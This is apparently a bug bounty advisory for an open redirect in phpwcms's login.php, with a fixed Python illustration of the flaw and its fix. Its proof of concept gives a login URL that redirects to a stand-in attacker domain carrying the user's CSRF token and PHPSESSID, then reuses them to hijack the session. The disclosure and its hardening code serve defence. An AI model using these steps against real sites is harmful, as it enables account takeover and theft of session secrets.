Open Redirect in slackero/phpwcms

Valid

Reported on

Aug 12th 2021


✍️ Description

Session hijacking via open redirection

🕵️‍♂️ Proof of Concept

Steps to reproduce
1. Open http://your-domain.tld/login.php?ref=http://attackers-domain.tld/? (the value of ref is attacker-controlled and is not checked against the site's own origin, so this link can be handed to any victim)
2. Log in with a valid account
3. After login the application redirects to http://attackers-domain.tld/?&csrftoken=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&PHPSESSID=yyyyyyyyyyyyyyyy, so the CSRF token and session ID are sent to the attacker's server in the request URL (where they also land in its access logs)

💥 Impact

This vulnerability lets an attacker obtain a logged-in user's csrftoken and PHPSESSID, because both values are appended to a redirect target the attacker chooses.

Since the application accepts the session identifier from the query string, the attacker then opens http://your-domain.tld/phpwcms.php?csrftoken=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&PHPSESSID=yyyyyyyyyyyyyyyy and takes over the valid user's session, CSRF token included.
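The redirect pattern from the proof of concept and the impact section, as an added example that is not phpwcms's own code: a redirect built from an unvalidated ref parameter with the CSRF token and session ID appended, next to a hardened target check that only accepts a same-site path and appends nothing. It is written in Python rather than PHP so it runs stand-alone; the function names, the default landing page /phpwcms.php and the x/y token values are assumptions for illustration.

```python
# Added example, not phpwcms code: the redirect pattern the report describes
# (an unvalidated ``ref`` parameter that has the CSRF token and session ID
# appended) next to a hardened target check. Function names, the default
# landing page and the token values are assumptions for illustration.
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

DEFAULT_TARGET = "/phpwcms.php"  # assumed post-login landing page


def vulnerable_redirect(ref: str, csrftoken: str, sessid: str) -> str:
    """Build the Location value the way the report shows it being built.

    ``ref`` is used verbatim, so any absolute URL is accepted, and the two
    secrets travel in the query string of wherever ``ref`` points.
    """
    sep = "&" if "?" in ref else "?"
    return f"{ref}{sep}csrftoken={csrftoken}&PHPSESSID={sessid}"


def leaked_parameters(location: str) -> dict:
    """What the owner of the redirect target receives in its request URL."""
    return dict(parse_qsl(urlsplit(location).query))


def is_safe_local_path(ref: str) -> bool:
    """Accept only a path on the current site, e.g. '/index.php?id=2'.

    Rejects:
      * anything with a scheme or host (http://..., //host, javascript:...)
      * '/\\host' and other backslash forms that browsers treat as '//host'
      * control characters, which could split the Location header
    """
    if not ref or not ref.startswith("/") or ref.startswith("//"):
        return False
    if any(ord(c) < 0x20 for c in ref) or "\\" in ref:
        return False
    parts = urlsplit(ref)
    return parts.scheme == "" and parts.netloc == ""


def safe_redirect_target(ref: Optional[str]) -> str:
    """Hardened replacement: same-site path or the default landing page.

    The session ID and CSRF token are deliberately not appended: the session
    stays in the PHPSESSID cookie and the token is read from the form/session,
    so no secret ends up in a URL, a Referer header or a server log.
    """
    if ref and is_safe_local_path(ref):
        return ref
    return DEFAULT_TARGET


if __name__ == "__main__":
    # Constructed values standing in for the report's xxxx/yyyy placeholders.
    ref = "http://attackers-domain.tld/?"
    loc = vulnerable_redirect(ref, "x" * 32, "y" * 16)
    print("vulnerable:", loc)
    print("leaked to attacker:", sorted(leaked_parameters(loc)))
    print("hardened:", safe_redirect_target(ref))
    print("hardened (legitimate ref):", safe_redirect_target("/index.php?id=2"))
```

The check is an allow-list on shape (a single leading slash, no scheme, no host, no backslash, no control characters) rather than a block-list of known bad prefixes, because browsers normalise forms such as `/\host` and `//host` into a cross-site navigation. Keeping the session ID out of the URL also removes the second half of the problem: even a successful open redirect then leaks nothing usable for hijacking.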

📍 Location

login.php#L81, login.php#L243

bAu modified their report
4 months ago
We have contacted a member of the slackero/phpwcms team and are waiting to hear back 4 months ago
slackero/phpwcms maintainer validated this vulnerability 4 months ago
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
slackero/phpwcms maintainer confirmed that a fix has been merged on 45171f 4 months ago
The fix bounty has been dropped